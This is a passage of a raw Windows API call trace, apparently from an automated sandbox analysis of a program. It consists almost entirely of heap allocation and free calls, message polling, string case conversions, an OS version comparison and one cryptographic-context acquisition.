lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.360] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.360] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0190.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.361] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.361] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.361] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0190.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.361] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.361] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0190.361] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.361] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.361] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.363] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.363] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.363] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.363] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0190.363] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0190.363] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.363] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.364] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0190.364] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.364] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0190.364] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0190.364] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0190.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0190.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0190.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0190.364] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xaa3868) returned 1 [0190.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0190.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0190.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0190.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0190.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0190.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0190.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0190.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0190.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0190.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0190.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0190.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0190.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0190.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0190.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0190.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0190.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0190.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0190.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0190.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0190.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0190.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0190.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0190.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0190.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0190.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0190.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0190.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0190.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0190.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0190.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0190.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0190.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0190.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0190.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0190.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0190.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0190.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0190.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0190.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0190.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0190.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0190.369] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0190.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0190.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0190.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0190.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0190.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0190.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0190.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0190.370] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0190.370] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0190.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c98 [0190.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0190.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0190.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0190.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0190.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0190.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0190.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.372] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0190.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0190.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0190.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0190.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0190.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0190.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0190.372] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0190.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0190.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0190.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0190.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0190.373] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.373] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0190.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0190.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0190.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0190.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.374] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0190.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 